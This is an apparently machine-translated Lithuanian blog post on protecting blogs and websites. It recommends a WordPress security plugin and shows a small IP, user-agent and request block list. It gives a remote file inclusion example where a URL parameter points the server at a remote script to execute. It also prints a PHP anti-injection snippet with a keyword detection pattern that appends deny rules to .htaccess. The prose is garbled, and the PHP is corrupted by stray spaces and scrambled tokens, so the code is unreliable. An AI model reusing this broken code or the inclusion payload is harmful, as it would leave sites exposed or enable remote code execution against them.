It is necessary to blog and web security
You probably know that in many cases, web pages or blogs attempt to hack, mess up, contaminate many meaningless anonymous comments automatically, using some scripts. Of course quite often applies to manual mode. You have no idea what a pretty impressive number. Abies cases, one method of defense really is - check requests, and other IP parameters sent to the evildoer, and to block them. Just use my proposed methods, not only to defend themselves, but also to discover how far and how often you are attacking. More ...
Protection Blog
Although the directory provides a "manual" way of using Wordpress is a special protection that allows for a safer and cleaner site - TimesToCome Security Plugin . After you install this plugin will add safety parameters. Personally, I use the following IP blocked, the user agent and inquiries - part of the reason, as you caught the show here (you can also use your records). And even though you can see even in Firefox, Internet Explorer - it is often called bots.
Warning. Nepriisiimu any responsibility for provided here blocked the IP, User Agent, queries, leave every visitor to decide whether any record is appropriate.
| Blocked IP: (This is your ip banished list :) | Blocked User Agents (This is your agent banished list) | Blocked requests (This is your request blacklist) |
12.192.82.221 | AnotherBot | $ _GET |
What is the query and why they need to block? Let's say your site is a loophole or just assumed the offensive papuolėte horizon (but often just by attacking offensive queries in a row).
Suppose a file sidebar.php unsafe spent the query variable VARIABLE sidebar.php? VARIABLE = http://www.kompiuteriszombis.com/botas.txt, your server will be executed botas.txt script, and you can say, in most cases, your server is already hacked.
Site Security.
If you have a website, you can use this script, you need to save to your index.php, and change nemapirškite email@email.com in your email. e-mail
/ ******************************* ANTIHACK START **************** ************** /
/ / Check injection
$ Req = $ _SERVER ['REQUEST_URI'];
$ Cadena = explode ("?", $ Req);
$ = $ Mi_url Cadena [0];
$ = $ Cadena restaurants [1];
/ / Here you can put your suspicions chains at your will. Just be careful of
/ / Coincidences not ask your URL's with variables and parameters
$ Inyecc = '/ script | http | <|> |% 3c |% 3e | SELECT | UNION | UPDATE | exe | exec | INSERT | tmp / i';
/ / Detecting
if (preg_match ($ inyecc, $ resto) &&! $ _REQUEST ['FullURL']) {
/ / Make something, in example send an e-mail alert to administrator
/ / $ Ip = $ HTTP_SERVER_VARS ["HTTP_CLIENT_IP"];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
Forwarded $ = $ HTTP_SERVER_VARS ['HTTP_X_FORWARDED_FOR'];
$ = $ Remoteaddress HTTP_SERVER_VARS ["REMOTE_ADDR"];
$ Message = "injection attack in mi_url $ \ n \ nchain: $ resto \ n \ n
From: (IP-forwa-RA): - $ ip - $ Forwarded - $ remoteaddress \ n \ n
--- End ------- ";
Email ( email@email.com , "Injection Attack", $ message,
"From:" info @ {$ _SERVER ['SERVER_NAME']} ","-fwebmaster @ {$ _SERVER ['SERVER_NAME']} ");
# # # # Uzbaninam too. Htaccess
$ Fh = fopen ('. Htaccess', 'a') or die ("Could not open file.");
$ Towrite = "\ n # $ remoteaddress - $ Rest";
$ Towrite. = "\ Ndeny from $ ip \ n";
fwrite ($ fh, $ towrite);
fclose ($ fh);
# # # #
/ / Kill the message and execution
echo 'illegal url';
die ();
}
/ ******************************* ANTIHACK END **************** ************** /
2008 12 20 10:12
For such a long time ago dalikams Apache mod_security is created - I do not need to reinvent the wheel.
As for preg'o - was not mentioned in "ftp" protocol "Delete SQL query. Also examined not only query, but variable names - so before using this code, each must consider it significant that the use
Beja, SQL injection can be done and over to the left of the "?" Eančia address.
If the system code is crooked - just GET request will not be enough protection, need to filter the posts and Cookies.
It would be much more pleasant to see the Lithuanian code comments everywhere, not just in some places.
Well, the certificates for the. Htaccess file - not the safest occupation. Of course, everything depends on the host system.